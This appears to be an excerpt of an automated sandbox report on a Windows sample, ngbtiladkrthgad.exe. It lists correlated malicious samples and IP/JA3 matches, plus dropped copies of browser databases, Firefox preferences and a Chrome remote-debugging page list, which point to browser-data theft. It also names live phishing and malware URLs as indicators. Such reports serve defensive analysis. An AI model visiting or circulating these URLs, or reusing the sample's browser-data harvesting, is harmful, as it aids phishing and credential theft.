                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            TELEGRAMRUXClient.exe.bin.exeGet hashmaliciousXWormBrowse
                                                                                            • 149.154.167.220
                                                                                            Bank_Statement.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 149.154.167.220
                                                                                            CheatInjector.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 149.154.167.99
                                                                                            NDQ211216GM08.exe.bin.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            SimpleLoader v2.1.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 149.154.167.99
                                                                                            2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            https://parta-doc.surge.sh/connexion.htmlGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            Launcher.exeGet hashmaliciousLummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                            • 149.154.167.99
                                                                                            HETZNER-ASDEAAHiVVNIKQESryT.exeGet hashmaliciousFormBookBrowse
                                                                                            • 144.76.229.203
                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                            • 88.198.246.242
                                                                                            uy2g7z.batGet hashmaliciousUnknownBrowse
                                                                                            • 195.201.57.90
                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                            • 88.198.246.242
                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                            • 88.198.246.242
                                                                                            http://abhishek9589.github.io/netflixclone/Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 78.46.22.25
                                                                                            http://copyright-accountscenter.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 116.202.166.112
                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                            • 88.198.246.242
                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                            • 88.198.246.242
                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                            • 88.198.246.242

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            28a2c9bd18a11de089ef85a160da29e4Dean Cartlidge_mthxvj.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 131.253.33.254
                                                                                            https://jpctscg.com/-jp/Get hashmaliciousUnknownBrowse
                                                                                            • 131.253.33.254
                                                                                            https://dqfaadcgq.insfuafasf.net/?mce.amazon.co.jp=hxxps//account.amazon.co.jpGet hashmaliciousUnknownBrowse
                                                                                            • 131.253.33.254
                                                                                            https://ahgwyq.com/rukatenlogin/Get hashmaliciousUnknownBrowse
                                                                                            • 131.253.33.254
                                                                                            https://ahgwyq.com/rukatenloginGet hashmaliciousUnknownBrowse
                                                                                            • 131.253.33.254
                                                                                            https://myaupaykddi-fs.shop/au/uqmobile/Get hashmaliciousUnknownBrowse
                                                                                            • 131.253.33.254
                                                                                            https://gkcottrydyagy.xyz/anaalogin/Get hashmaliciousUnknownBrowse
                                                                                            • 131.253.33.254
                                                                                            https://peraldohugo.comGet hashmaliciousUnknownBrowse
                                                                                            • 131.253.33.254
                                                                                            DE-10192.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 131.253.33.254
                                                                                            xo.batGet hashmaliciousUnknownBrowse
                                                                                            • 131.253.33.254
                                                                                            37f463bf4616ecd445d4a1937da06e19Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 149.154.167.99
                                                                                            • 78.47.63.132
                                                                                            NDQ211216GM08.exe.bin.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.99
                                                                                            • 78.47.63.132
                                                                                            PO-USH3gS.pdf.pif.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • 149.154.167.99
                                                                                            • 78.47.63.132
                                                                                            IPt9U27NoX.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.99
                                                                                            • 78.47.63.132
                                                                                            IPt9U27NoX.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.99
                                                                                            • 78.47.63.132
                                                                                            justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.99
                                                                                            • 78.47.63.132
                                                                                            443_2003_https-df.exeGet hashmaliciousMetasploitBrowse
                                                                                            • 149.154.167.99
                                                                                            • 78.47.63.132
                                                                                            443_2003_https-df.exeGet hashmaliciousMetasploitBrowse
                                                                                            • 149.154.167.99
                                                                                            • 78.47.63.132
                                                                                            faktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.99
                                                                                            • 78.47.63.132
                                                                                            SecuriteInfo.com.FileRepMalware.26489.28570.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.99
                                                                                            • 78.47.63.132

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\o89zu\dbs0r9

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):294912
                                                                                            Entropy (8bit):0.08436842005578409
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                            MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                            SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                            SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                            SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\o89zu\gdtrim

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):9571
                                                                                            Entropy (8bit):5.536643647658967
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                            MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                            SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                            SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                            SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                            C:\ProgramData\o89zu\hdjw4o

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3046000, file counter 6, database pages 41, 1st free page 29, free pages 1, cookie 0x25, schema 4, UTF-8, version-valid-for 6
                                                                                            Category:dropped
                                                                                            Size (bytes):196608
                                                                                            Entropy (8bit):0.4792253015780342
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:xWpdkG7xQ+ALqL/uejzH+bF+UIYysX0lj/twfLyl0e9S8E:ApdkG77IqL/tH+bF+UI3i67Kylj9
                                                                                            MD5:33642526D21BAF34FB5D5AAF11B3FB91
                                                                                            SHA1:A64B4A7605D8B449C085474A3484921975EF6C14
                                                                                            SHA-256:3ED06184837C7FF625C54589CA2037F127E0525E3541DE8960A9D5503625862B
                                                                                            SHA-512:A013359FCBAC1005653793D3FF6398E32746E2F6FFCDA26AA3C9EB96279F7A2E989E05B5B8D2510EAF5F93DDD6281A71773DA81C472FCC71AD74315353948782
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:SQLite format 3......@ .......)...........%......................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\o89zu\hvsri5

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):98304
                                                                                            Entropy (8bit):0.08235737944063153
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\o89zu\jmym7q

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
                                                                                            Category:dropped
                                                                                            Size (bytes):139264
                                                                                            Entropy (8bit):1.1366509594298093
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
                                                                                            MD5:C5CFBCA422AD1353E7116A02424C59FD
                                                                                            SHA1:38F032839FC5E1F890FAA636390A3CC9556AD350
                                                                                            SHA-256:F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
                                                                                            SHA-512:94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\o89zu\sjwt0hlfu

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                            Category:dropped
                                                                                            Size (bytes):49152
                                                                                            Entropy (8bit):0.8180424350137764
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\o89zu\sr90rq

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):126976
                                                                                            Entropy (8bit):0.47147045728725767
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\o89zu\uaiwlfus2

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):40960
                                                                                            Entropy (8bit):0.8616778647394084
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
                                                                                            MD5:BDDE4AD11E732420E7ABCCA946B11611
                                                                                            SHA1:278C3386A37BAFCA507CF4C128600B01B312DDA0
                                                                                            SHA-256:099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
                                                                                            SHA-512:B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\o89zu\xb1vk6

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):114688
                                                                                            Entropy (8bit):0.9746603542602881
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\json[1].json

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1787
                                                                                            Entropy (8bit):5.3786871129390015
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:SfNaoCBTECZfNaoCT0CAfNaoCEmuYCEmofNaoCOAFi0UrU0U8CO1:6NnCBTEC1NnCT0CMNnCEmuYCEm0NnCOR
                                                                                            MD5:EA735DC09F120FF67C707040194F2C77
                                                                                            SHA1:095F01C459E52B196652BFF59E62301BAB74E6C2
                                                                                            SHA-256:779F5F856BDACD6AA1914C790DBE9BD0B41FDC607DB24B7448FF6A5987F41098
                                                                                            SHA-512:72C75C7343511281032C98C9BB6CDB8CC0FB4EDE433B69B727034B3CFA401A2AAF5FE221DD6E9122257923FDF5267677A80DFA60153C8850E15FC8BFF510DB5B
                                                                                            Malicious:false
                                                                                            Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/2C68542595FAD1DA4A3396E4A4E9E861",.. "id": "2C68542595FAD1DA4A3396E4A4E9E861",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/2C68542595FAD1DA4A3396E4A4E9E861"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/08C717EFF68E690085209B88F23AE7CA",.. "id": "08C717EFF68E690085209B88F23AE7CA",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/08C717EFF68E690085209B88F23AE7CA"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                            Chrome Cache Entry: 66

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                            Category:downloaded
                                                                                            Size (bytes):5162
                                                                                            Entropy (8bit):5.349865760247148
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:mtOTUb1db1ClNY5co7shdiUYVqig7O7aZCUgpgXEt94k+g8IHh8u928DoCLQ:mtOT8TfL1Vqig7mIg8IB8u88DA
                                                                                            MD5:70A8F21806E7F1B739937970EBE49A0C
                                                                                            SHA1:6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
                                                                                            SHA-256:C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
                                                                                            SHA-512:3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
                                                                                            Malicious:false
                                                                                            URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.sDa5bc0wD58.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTucClwlLUqaQmlTybxGncrc_XS2Pg"
                                                                                            Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_H .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_H .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_H .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                            Chrome Cache Entry: 67

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:ASCII text
                                                                                            Category:downloaded
                                                                                            Size (bytes):29
                                                                                            Entropy (8bit):3.9353986674667634
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                            MD5:6FED308183D5DFC421602548615204AF
                                                                                            SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                            SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                            SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                            Malicious:false
                                                                                            URL:https://www.google.com/async/newtab_promos
                                                                                            Preview:)]}'.{"update":{"promos":{}}}

                                                                                            Chrome Cache Entry: 68

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:ASCII text, with very long lines (65531)
                                                                                            Category:downloaded
                                                                                            Size (bytes):131642
                                                                                            Entropy (8bit):5.437724993915425
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:M+ekDj4BST/k4ZYSTVcxhNKaZI4RpTh6z6x0zW:jFjLT/k4ZYSTVcxhNKaZI4RpTh46AW
                                                                                            MD5:9B11C71BC7E86A80D349E46487E13FA1
                                                                                            SHA1:4C537181125445977397EE51432853B3EB6427CC
                                                                                            SHA-256:CC5B207B7951AB84EA99C6E8E4E310CED84DB3A19F0F75555E3DC0C14156F77B
                                                                                            SHA-512:B3E4CE5B1E550224AB21181A1375A498A00C2350F959E1C79E5147537AFEEC975B95660DC0BE20C1BA643D3EDFF4FDCB9FCCA04F771A0BA331BC55F7E33728E3
                                                                                            Malicious:false
                                                                                            URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                            Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                            Chrome Cache Entry: 69

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:ASCII text, with very long lines (2412)
                                                                                            Category:downloaded
                                                                                            Size (bytes):173494
                                                                                            Entropy (8bit):5.555398746302217
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:wZ7uHDIsNQgotB5eWAkoF8SgF5JBnz5P2eNmAp1ofnDT9mm0GdZINGJDuqFeRyX5:wZ7ujIsNQgotBwWAkoF8S25JBnz5P2eg
                                                                                            MD5:4B41432CA29BA7B366890C3211D319DD
                                                                                            SHA1:C60F89E8ACCE6E93A14BE7E09C8A719BAC3AAF46
                                                                                            SHA-256:9E09A8F1471D9E076C80D0E6D9D4A888E34D63EA93EF10740811E82FA9E1BD94
                                                                                            SHA-512:BA762DAE90D37D25E8BA33F7FC43A58C6C758D842912288110923F798245A3A1408AFC13AAC7124A8CDE2D3E6D9AB50BDD626D0558421945785139E0EDA15C38
                                                                                            Malicious:false
                                                                                            URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.eebVy_fNKiM.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTv9PWxAWOkNMB0THY2YxYWamdWWtA"
                                                                                            Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Oi=function(a){if(4&a)return 2048&a?2048:4096&a?4096:0};_.Pi=class extends _.P{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Qi,Ti,Ui,Wi,Xi,aj;Qi=function(){return typeof BigInt==="function"};Ti=function(a){const b=a>>>0;_.Ri=b;_.Si=(a-b)/4294967296>>>0};Ui=function(a,b){b=~b;a?a=~a+1:b+=1;return[a,b]};_.Vi=function(a){if(a<0){Ti(-a);const [b,c]=Ui(_.Ri,_.Si);_.Ri=b>>>0;_.Si=c>>>0}else Ti(a)};Wi=function(a){a=String(a);return"0000000".slice(a.length)+a};.Xi=function(a,b){b>>>=0;a>>>=0;if(b<=2097151)var c=""+(4294967296*b+a);else Qi()?c=""+(BigInt(b)<<BigInt(32)|BigInt(a)):(c=(a>>>24|b<<8)&16777215,b=b>>16&65535,a=(a&16777215)+c*6777216+b*6710656,c+=b*8147497,b*=2,a>=1E7&&(c+=a/1E7>>>0,a%=1E7),c>=1E7&&(b+=c/1E7>>>0,c%=1E7),c=b+Wi(c)+Wi(a));return c};_.Yi=function(a,b){if(b&2147483648)if(Qi())a=""+(BigInt(b|0)<<BigInt(32)|BigInt(a>>>0));else{const [c,d]=Ui(a,b);a="-"+Xi(c,d)}else a=Xi(a,b);return a};._.Zi

                                                                                            Chrome Cache Entry: 70

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                            Category:downloaded
                                                                                            Size (bytes):1660
                                                                                            Entropy (8bit):4.301517070642596
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                            MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                            SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                            SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                            SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                            Malicious:false
                                                                                            URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
